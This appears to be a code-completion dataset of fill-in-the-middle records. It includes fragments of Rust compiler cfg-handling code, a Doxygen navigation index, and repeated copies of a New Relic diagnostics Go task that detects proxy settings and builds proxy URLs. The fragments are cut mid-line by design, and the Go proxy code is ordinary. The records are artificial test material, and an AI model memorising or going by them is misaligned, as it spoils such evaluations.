self.sess.span_diagnostic.span_err(mis[0].span, "unexpected literal");
return true;
}
attr::cfg_matches(mis[0].meta_item().unwrap(), self.sess, self.features)
})
}
// Visit attributes on expression and statements (but not attributes on items in blocks).
fn visit_expr_attrs(&mut self, attrs: &[ast::Attribute]) {
// flag the offending attributes
for attr in attrs.iter() {
self.maybe_emit_expr_attr_err(attr);
}
}
/// If attributes are not allowed on expressions, emit an error for `attr`
pub fn maybe_emit_expr_attr_err(&self, attr: &ast::Attribute) {
if !self.features.map(|features| features.stmt_expr_attributes).unwrap_or(true) {
let mut err = feature_err(self.sess,
"stmt_expr_attributes",
attr.span,
GateIssue::Language,
EXPLAIN_STMT_ATTR_SYNTAX);
if attr.is_sugared_doc {
err.help("`///` is for documentation comments. For a plain comment, use `//`.");
}
err.emit();
}
|
pub fn configure_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
ast::ForeignMod {
abi: foreign_mod.abi,
items: foreign_mod.items.into_iter().filter_map(|item| self.configure(item)).collect(),
}
}
fn configure_variant_data(&mut self, vdata: ast::VariantData) -> ast::VariantData {
match vdata {
ast::VariantData::Struct(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Struct(fields.collect(), id)
}
ast::VariantData::Tuple(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Tuple(fields.collect(), id)
}
ast::VariantData::Unit(id) => ast::VariantData::Unit(id)
}
}
pub fn configure_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
match item {
ast::ItemKind::Struct(def, generics) => {
ast::ItemKind::Struct(self.configure_variant_data(def), generics)
}
ast::ItemKind::Union(def, generics) => {
ast::ItemKind::Union(self.configure_variant_data(def), generics)
}
ast::ItemKind::Enum(def, generics) => {
let variants = def.variants.into_iter().filter_map(|v| {
self.configure(v).map(|v| {
Spanned {
node: ast::Variant_ {
ident: v.node.ident,
attrs: v.node.attrs,
data: self.configure_variant_data(v.node.data),
disr_expr: v.node.disr_expr,
},
span: v.span
}
})
});
ast::ItemKind::Enum(ast::EnumDef {
variants: variants.collect(),
}, generics)
}
item => item,
}
}
pub fn configure_expr_kind(&mut self, expr_kind: ast::ExprKind) -> ast::ExprKind {
match expr_kind {
ast::ExprKind::Match(m, arms) => {
let arms = arms.into_iter().filter_map(|a| self.configure(a)).collect();
ast::ExprKind::Match(m, arms)
}
ast::ExprKind::Struct(path, fields, base) => {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
ast::ExprKind::Struct(path, fields, base)
}
_ => expr_kind,
}
}
pub fn configure_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
self.visit_expr_attrs(expr.attrs());
// If an expr is valid to cfg away it will have been removed by the
// outer stmt or expression folder before descending in here.
// Anything else is always required, and thus has to error out
// in case of a cfg attr.
//
// NB: This is intentionally not part of the fold_expr() function
// in order for fold_opt_expr() to be able to avoid this check
if let Some(attr) = expr.attrs().iter().find(|a| is_cfg(a) || is_test_or_bench(a)) {
let msg = "removing an expression is not supported in this position";
self.sess.span_diagnostic.span_err(attr.span, msg);
}
self.process_cfg_attrs(expr)
}
pub fn configure_stmt(&mut self, stmt: ast::Stmt) -> Option<ast::Stmt> {
self.configure(stmt)
}
pub fn configure_struct_expr_field(&mut self, field: ast::Field) -> Option<ast::Field> {
self.configure(field)
}
pub fn configure_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
pattern.map(|mut pattern| {
if let ast::PatKind::Struct(path, fields, etc) = pattern.node {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
pattern.node = ast::PatKind::Struct(path, fields, etc);
}
pattern
})
}
// deny #[cfg] on generic parameters until we decide what to do with it.
// see issue #51279.
pub fn disallow_cfg_on_generic_param(&mut self, param: &ast::GenericParam) {
for attr in param.attrs() {
let offending_attr = if attr.check_name("cfg") {
"cfg"
} else if attr.check
|
}
|
random_line_split
|
navtreeindex32.js
|
2027acb372a1300":[2,0,367,1,8],
"struct_ui_transform_interface_1_1_rect_points.html#a15903c70e62a24d7a1191e8d75a8f779":[2,0,367,1,2],
"struct_ui_transform_interface_1_1_rect_points.html#a19297746a907c54dd19d40177567e7ae":[2,0,367,1,4],
"struct_ui_transform_interface_1_1_rect_points.html#a483b7c8841920a46241bd6192a6d4288":[2,0,367,1,12],
"struct_ui_transform_interface_1_1_rect_points.html#a5d00fffdb89e1b47eb8614af06feb9de":[2,0,367,1,18],
"struct_ui_transform_interface_1_1_rect_points.html#a5dfc5d9bb084be608ee2119de27a16ba":[2,0,367,1,5],
"struct_ui_transform_interface_1_1_rect_points.html#a6246af650e6c70630fa380f26792a456":[2,0,367,1,11],
"struct_ui_transform_interface_1_1_rect_points.html#a71438e1e0b31c8bb5706f052d8f9aa35":[2,0,367,1,16],
"struct_ui_transform_interface_1_1_rect_points.html#a889c677998aede93e755b73b8540ece7":[2,0,367,1,1],
"struct_ui_transform_interface_1_1_rect_points.html#a957bfb7b19a01aecece49ea810fb69a3":[2,0,367,1,7],
"struct_ui_transform_interface_1_1_rect_points.html#a99e7404d4a1c65687d1b77fe85a670a6":[2,0,367,1,10],
"struct_ui_transform_interface_1_1_rect_points.html#a9f086e5a232896db8b87eb6c2c676f57":[2,0,367,1,19],
"struct_ui_transform_interface_1_1_rect_points.html#aaa0b5e92d4c48d8bde7085a67f0d3b46":[2,0,367,1,9],
"struct_ui_transform_interface_1_1_rect_points.html#ab119ef9afd6289c2aae7f42ddcb961d0":[2,0,367,1,17],
"struct_ui_transform_interface_1_1_rect_points.html#ab58c94a9b801ea7653b89b04ad7ec444":[2,0,367,1,3],
"struct_ui_transform_interface_1_1_rect_points.html#abe4ef3ccec657670c92a8128dea7ab13":[2,0,367,1,13],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eb":[2,0,367,1,0],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba10312e668115d6f3d93629c7193349cf":[2,0,367,1,0,0],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba39d10d4d2f233ac9d277f1091054ebad":[2,0,367,1,0,4],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba5d176e03edb82e7d517427bfb6437dc3":[2,0,367,1,0,1],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba63a41eb635d9615d24d4d8363eac8f2c":[2,0,367,1,0,2],
"struct_ui_transform_interface_1_1_rect_points.html#ac2a9ddca713181cc2c447e8cae0598eba684aca726a78b13689966c6c26f25a8c":[2,0,367,1,0,3],
"struct_ui_transform_interface_1_1_rect_points.html#ac336e6a46e84efc8cb1ddb5b80b3e49c":[2,0,367,1,6],
"struct_ui_transform_interface_1_1_rect_points.html#acbee867e100de8231099e4c0fe36fbc9":[2,0,367,1,20],
"struct_ui_transform_interface_1_1_rect_points.html#ad8ae2a7c4af18fa4378653ea1dfb3862":[2,0,367,1,14],
"struct_ui_transform_interface_1_1_rect_points.html#aff037ac21137c798f7212ee51d6a12f8":[2,0,367,1,15],
"struct_viewport_helpers_1_1_element_edges.html":[2,0,9,0],
"struct_viewport_helpers_1_1_element_edges.html#a06de4fbb1bd596459a5c0d3fee269d2c":[2,0,9,0,3],
"struct_viewport_helpers_1_1_element_edges.html#a5ed9ca612a7669d8b04778a8502b3184":[2,0,9,0,13],
"struct_viewport_helpers_1_1_element_edges.html#a6313feab9e59a2c95b6f13b0ce94deb0":[2,0,9,0,11],
"struct_viewport_helpers_1_1_element_edges.html#a7a75bd32f68d05198f87de8c55e84f6a":[2,0,9,0,5],
"struct_viewport_helpers_1_1_element_edges.html#a827113a03cc9cdc2fc45feb7c9a9d021":[2,0,9,0,9],
"struct_viewport_helpers_1_1_element_edges.html#a827f9612276519467a11709900674f87":[2,0,9,0,2],
"struct_viewport_helpers_1_1_element_edges.html#a96f7d151ad93130428fd7a42033d44b4":[2,0,9,0,6],
|
"struct_viewport_helpers_1_1_element_edges.html#a972c7643a8ed0c49d05c0b789322338b":[2,0,9,0,7],
"struct_viewport_helpers_1_1_element_edges.html#a98be7c1a5536e868337c72dce24c59d4":[2,0,9,0,12],
"struct_viewport_helpers_1_1_element_edges.html#aa258e044d2dd1fa6fc74b11242953918":[2,0,9,0,0],
|
random_line_split
|
|
proxyDetect.go
|
config file
}
// minion has combined auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - No dependencies since this is generally one of the first tasks to run
func (p BaseConfigProxyDetect) Dependencies() []string {
// no dependencies!
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect) Execute(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have succesfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for you app and it is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string)
|
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there or to at least find out which agent are we dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precedence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precedence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and it overwrites other proxy settings
if proxy.proxyURL != "" {
return proxy.proxyURL
}
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will prepend a protocol to their host configuration, so we want to avoid building a URL such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
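setProxyURL assembles user[:password]@host[:port], returns the string untouched if the host already carries a protocol, and otherwise prefixes the configured scheme or falls back to http. A small Python sketch of the same assembly, with hypothetical parameter names:

def build_proxy_url(host, port='', user='', password='', scheme=''):
    url = ''
    if user:
        url += user
        if password:
            url += ':' + password
        url += '@'
    url += host
    if port:
        url += ':' + port
    if 'http' in url:                      # a protocol is already present, as in the Go check
        return url
    return (scheme or 'http') + '://' + url

# build_proxy_url('myproxy.mycompany.com', '8080', 'myuser', 'mypassword')
# -> 'http://myuser:mypassword@myproxy.mycompany.com:8080'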
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].
|
{
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
|
identifier_body
|
proxyDetect.go
|
config file
}
// minion has combined auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - No dependencies since this is generally one of the first tasks to run
func (p BaseConfigProxyDetect) Dependencies() []string {
// no dependencies!
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect)
|
(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have successfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for your app and is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string) {
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there, or at least find out which agent we are dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precedence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precedence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
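// Sketch of the precedence implemented by getProxyConfig above (a summary of the logic, not new behaviour):
//   1. New Relic environment variables win for every agent except the .ini-based ones (Python; PHP does not use env vars)
//   2. for .yml configs other than newrelic-infra.yml, Java system properties win over the file
//   3. otherwise the first matching proxy setting found in the config file itself is used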
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and it overwrites other proxy settings
if proxy.proxyURL != "" {
return proxy.proxyURL
}
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will prepend a protocol to their host configuration, so we want to avoid building a URL such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
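// Illustrative sketch (not part of the original task): with a hypothetical ProxyConfig holding
// user, password, host and port, setProxyURL above assembles a user-info URL and, since no scheme
// is configured and the host does not contain "http", falls back to the default "http://" prefix.
func exampleSetProxyURL() string {
	cfg := ProxyConfig{
		proxyHost:     "myproxy.mycompany.com",
		proxyPort:     "8080",
		proxyUser:     "myuser",
		proxyPassword: "mypassword",
	}
	return setProxyURL(cfg) // "http://myuser:mypassword@myproxy.mycompany.com:8080"
}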
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
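// Illustrative sketch (hypothetical key names; the real list lives in proxyEnvVarsKeys): the
// substring matching above turns these variables into host/port fields, while a key matching
// none of the substrings is treated as a full proxy URL.
func exampleEnvVarMapping() ProxyConfig {
	envVars := map[string]string{
		"NEW_RELIC_PROXY_HOST": "myproxy.mycompany.com",
		"NEW_RELIC_PROXY_PORT": "8080",
	}
	cfg := ProxyConfig{}
	for key, val := range envVars {
		lower := strings.ToLower(key)
		switch {
		case strings.Contains(lower, "host"):
			cfg.proxyHost = val
		case strings.Contains(lower, "port"):
			cfg.proxyPort = val
		default:
			cfg.proxyURL = val
		}
	}
	return cfg
}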
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].Payload
|
Execute
|
identifier_name
|
proxyDetect.go
|
config file
}
// minion has combined auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - Returns the tasks that must run before this one
func (p BaseConfigProxyDetect) Dependencies() []string {
// depends on config validation plus collected env vars and system properties
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect) Execute(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have successfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for your app and is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string) {
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there, or at least find out which agent we are dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precedence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precedence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and it overwrites other proxy settings
if proxy.proxyURL != ""
|
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will prepend a protocol to their host configuration, so we want to avoid building a URL such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
